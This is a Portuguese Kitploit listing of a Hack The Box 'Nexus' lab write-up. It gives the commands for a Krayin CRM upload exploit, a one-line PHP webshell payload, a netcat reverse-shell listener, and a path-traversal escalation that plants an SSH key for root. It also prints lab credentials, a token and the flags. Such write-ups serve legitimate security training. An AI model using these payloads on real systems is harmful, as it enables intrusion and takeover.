Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
htb-labs-nexus — # Write-up da máquina Nexus do Hack The Box, cobrindo reconhecimento, descoberta de credenciais no Gitea, exploração do Krayin CRM via CVE-2026-38526, acesso inicial e escalonamento de privilégios por meio de um serviço vulnerável de sincronização de templates do Gitea. | Kitploit
Ferramentas/GitHubGitHub/diegorivas1/htb-labs-nexus
Escalada de PrivilégiosReconhecimentoAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebCTFTestes de PenetraçãoAprendizado e Educação

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Labs e Prática
GitHubdiegorivas1/htb-labs-nexus

htb-labs-nexus

# Write-up da máquina Nexus do Hack The Box, cobrindo reconhecimento, descoberta de credenciais no Gitea, exploração do Krayin CRM via CVE-2026-38526, acesso inicial e escalonamento de privilégios por meio de um serviço vulnerável de sincronização de templates do Gitea.

Ver Repositório
há 8h 2mAinda não revisado

🏴‍☠️ Labs HTB - Nexus

Inglês 🇺🇸 | Espanhol 🇪🇸

Inglês | Espanhol

HTB Dificuldade SO Plataforma


📋 Visão Geral

Nexus é uma máquina Linux de dificuldade Fácil do Hack The Box que demonstra uma cadeia de ataque em múltiplas etapas envolvendo enumeração de hosts virtuais, credenciais expostas, funcionalidade vulnerável de aplicação web, execução remota de código, reutilização de credenciais e escalonamento local de privilégios.

Cadeia de Ataque

root@kitploit:~
Reconhecimento
      │
      ▼
Enumeração de Hosts Virtuais
      │
      ├── git.nexus.htb
      └── billing.nexus.htb
              │
              ▼
      Histórico de Commits do Gitea
              │
              ▼
       Credenciais Expostas
              │
              ▼
        Login no Krayin CRM
              │
              ▼
      CVE-2026-38526
              │
              ▼
        Webshell PHP
              │
              ▼
       Reverse Shell
        (www-data)
              │
              ▼
       .env da Aplicação
              │
              ▼
        SSH como jones
              │
              ▼
   gitea-template-sync
              │
              ▼
       Path Traversal
              │
              ▼
    Repositório Git Malicioso
              │
              ▼
         SSH como root

Técnicas-Chave

  • 🔍 Enumeração de hosts virtuais
  • 🔑 Descoberta de credenciais através do histórico de commits do Git
  • 💻 Exploração do Krayin CRM
  • 🐚 Webshell PHP e reverse shell
  • 🔐 Reutilização de credenciais
  • 🔬 Enumeração de serviços Linux
  • 📂 Path traversal
  • 🌳 Construção de repositório Git malicioso
  • 👑 Escalonamento de privilégios para root

IP Alvo: 10.129.82.92


🔍 Fase 1 Reconhecimento

Varredura de Portas

root@kitploit:~
nmap -p- -sV -sC -oN nexus_full_scan.txt 10.129.82.92

Resultados

root@kitploit:~
22/tcp  open  ssh   OpenSSH 9.6p1 Ubuntu
80/tcp  open  http  nginx 1.24.0 (Ubuntu)

Enumeração de Hosts Virtuais

root@kitploit:~
gobuster vhost \
-u http://nexus.htb \
-w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt \
--append-domain

Hosts Descobertos

root@kitploit:~
git.nexus.htb       → Gitea
billing.nexus.htb   → Krayin CRM

Adicione os hosts descobertos ao /etc/hosts:

root@kitploit:~
echo "10.129.82.92 nexus.htb git.nexus.htb billing.nexus.htb" | sudo tee -a /etc/hosts

🔑 Fase 2 Descoberta de Credenciais

Enumeração do Gitea

Navegue até:

root@kitploit:~
http://git.nexus.htb

Um repositório chamado:

root@kitploit:~
admin/krayin-docker-setup

contém informações úteis no seu histórico do Git.

O arquivo .env pode ser recuperado de commits anteriores, revelando credenciais que não estão mais presentes na versão atual.

Credenciais Descobertas

ServiçoNome de UsuárioSenha
Krayin CRM[email protected]N27xh!!2ucY04
GiteajonesN27xh!!2ucY04

O endereço de e-mail [email protected] também foi identificado na seção de empregos do site principal.


💻 Fase 3 CVE-2026-38526 : Krayin CRM

Login no CRM

root@kitploit:~
URL: http://billing.nexus.htb/admin/login

E-mail: [email protected]
Senha: N27xh!!2ucY04

Envio do Webshell

Navegue até:

root@kitploit:~
/admin/mail/sent

Em seguida:

  1. Clique em Compose Mail.
  2. Anexe o payload PHP.
  3. Intercepte a requisição usando o Burp Suite.
  4. Modifique o nome do arquivo enviado.
  5. Altere o tipo MIME.
  6. Encaminhe a requisição.

O payload está armazenado em:

root@kitploit:~
exploits/CVE-2026-38526/shell.php

Payload:

root@kitploit:~
<?php system($_GET["cmd"]); ?>

Os campos multipart relevantes são:

root@kitploit:~
Content-Disposition: form-data; name="attachments[]"; filename="shell.php"
Content-Type: application/x-php

Webshell

Após o envio bem-sucedido:

root@kitploit:~
http://billing.nexus.htb/storage/emails/2/shell.php?cmd=id

Resultado esperado:

root@kitploit:~
uid=33(www-data) gid=33(www-data) groups=33(www-data)

📡 Fase 4 Reverse Shell

Inicie um listener:

root@kitploit:~
nc -lvnp 4444

Em seguida, acione o reverse shell através do webshell enviado.

A implementação em Python está disponível em:

root@kitploit:~
exploits/CVE-2026-38526/reverse_shell.py

Nesta etapa, o shell é obtido como:

root@kitploit:~
www-data

🐚 Fase 5 Acesso de Usuário

Leia a Configuração da Aplicação

Inspecione a configuração do Krayin:

root@kitploit:~
cat /var/www/krayin/.env

Credenciais são encontradas:

root@kitploit:~
DB_USERNAME=krayin
DB_PASSWORD=y27xb3ha!!74GbR

Enumere Usuários

root@kitploit:~
cat /etc/passwd | grep sh$

A conta jones é identificada.

SSH como jones

root@kitploit:~
ssh [email protected]

Senha:

root@kitploit:~
y27xb3ha!!74GbR

Flag de Usuário

root@kitploit:~
f20cbf9aeb6bb228d356a42ff49c1933

🔬 Fase 6 Escalonamento de Privilégios

Enumere Serviços

root@kitploit:~
systemctl list-units | grep -i gitea

Os seguintes serviço e timer são identificados:

root@kitploit:~
gitea-template-sync.timer
gitea-template-sync.service

O serviço é executado com privilégios elevados.

Script Vulnerável

root@kitploit:~
/etc/gitea/template-sync.py

O mecanismo de sincronização usa construção de caminhos que pode ser abusada através de path traversal.


🎯 Fase 7 Repositório Git Malicioso

Gere um par de chaves SSH:

root@kitploit:~
ssh-keygen -t ed25519 -f /tmp/nexus_root -N ""
cat /tmp/nexus_root.pub

O exploit de manipulação de objetos Git está localizado em:

root@kitploit:~
exploits/gitea_template_sync/exploit_git.py

Crie o repositório:

root@kitploit:~
cd /tmp
rm -rf exploit
mkdir exploit
cd exploit

git init
python3 exploit_git.py

O repositório deve usar o branch:

root@kitploit:~
main

Token do Gitea

Gere um token de acesso pessoal através de:

root@kitploit:~
http://git.nexus.htb

Navegue até:

root@kitploit:~
Settings → Applications

Em seguida, configure o remote:

root@kitploit:~
git remote set-url origin http://jones:[email protected]/jones/exploit.git

Envie o repositório malicioso:

root@kitploit:~
git push -f origin main

⏰ Fase 8 Sincronização de Templates

Monitore o log de sincronização:

root@kitploit:~
tail -f /var/log/template-sync.log

A sincronização bem-sucedida resulta no processamento da árvore Git maliciosa pelo serviço privilegiado.

Exemplo:

root@kitploit:~
[2026-08-27 02:01:30] Syncing template: jones/exploit
[2026-08-27 02:01:30]   synced: ../../../../../root/.ssh/authorized_keys
[2026-08-27 02:01:30] Template sync complete

👑 Fase 9 Root

Depois que a chave pública SSH for gravada na conta root:

root@kitploit:~
ssh -i /tmp/nexus_root [email protected]

Verifique o acesso:

root@kitploit:~
whoami

Esperado:

root@kitploit:~
root

Recupere a flag de root:

root@kitploit:~
cat /root/root.txt

Flag de Root

root@kitploit:~
85be1d2a3084e387da0e7dd118908c63

🏆 Flags

FlagValor
Userf20cbf9aeb6bb228d356a42ff49c1933
Root85be1d2a3084e387da0e7dd118908c63

🔐 Credenciais

Estas credenciais pertencem ao ambiente de laboratório do Hack The Box documentado por este repositório.


🛠️ Ferramentas


📁 Estrutura do Repositório

root@kitploit:~
htb-labs-nexus/
├── README.md
├── exploits/
│   ├── CVE-2026-38526/
│   │   ├── shell.php
│   │   ├── reverse_shell.py
│   │   └── burp_request.txt
│   └── gitea_template_sync/
│       ├── exploit_git.py
│       ├── create_repo.sh
│       └── key.pub
├── scripts/
│   ├── linpeas.sh
│   ├── LinEnum.sh
│   └── enum_services.sh
├── assets/
│   ├── nmap_scan.txt
│   ├── gobuster_vhost.txt
│   └── credentials.txt
├── screenshots/
│   ├── gitea_repo.png
│   ├── crm_login.png
│   ├── webshell.png
│   └── root_flag.png
└── notes/
    ├── methodology.md
    ├── commands.md
    └── credentials.md

📚 Recursos Adicionais

  • CVE-2026-38526
  • Krayin CRM
  • Documentação do Gitea
  • OWASP Path Traversal

⚠️ Aviso Legal

Este repositório destina-se apenas a fins educacionais e testes de segurança autorizados.

As técnicas, credenciais, exploits e comandos documentados aqui não devem ser usados contra sistemas sem autorização explícita.


🎯 Principais Conclusões

  1. 🔍 Enumere Hosts Virtuais: serviços importantes podem estar ocultos atrás de subdomínios.
  2. 🔑 Revise o Histórico do Git: remover um segredo de um arquivo não significa que ele desapareceu do histórico do repositório.
  3. 💻 Analise Uploads de Arquivos: a validação de extensão e tipo MIME pode ser um controle de segurança crítico.
  4. 🐚 Enumere Após Obter um Shell: arquivos de configuração podem conter credenciais reutilizáveis.
  5. 🔬 Revise Serviços Privilegiados: um serviço executado como root pode se tornar um vetor de escalonamento de privilégios.
  6. 📂 Valide Caminhos de Arquivos Adequadamente: o tratamento inseguro de caminhos controlados pelo usuário pode introduzir vulnerabilidades de Path Traversal.
  7. 🌳 O Git Pode se Tornar um Vetor de Ataque: objetos e árvores do Git podem ser manipulados quando uma aplicação confia incorretamente em sua estrutura.

🙏 Créditos

  • Hack The Box : Máquina e plataforma de laboratório
  • P3lured : Write-up original
  • Tran Manh Tan : Guia complementar

⭐ Se você achou este write-up útil, considere dar uma estrela ao repositório.

Baixar ferramenta
ServiçoNome de UsuárioSenha / Chave
Krayin CRM[email protected]N27xh!!2ucY04
GiteajonesN27xh!!2ucY04
Token Giteajones1dd7105bf7e57cad02c5a56af5d92703a7839364
SSHjonesy27xb3ha!!74GbR
SSH Rootroot/tmp/nexus_root
FerramentaFinalidade
NmapEnumeração de portas e serviços
GobusterEnumeração de hosts virtuais
Burp SuiteInterceptação e modificação de requisições HTTP
GitAnálise de repositórios e construção de repositório malicioso
Python 3Scripts de exploração
NetcatListener de reverse shell
LinEnumEnumeração Linux
LinPEASEnumeração de escalonamento de privilégios
SSHAcesso remoto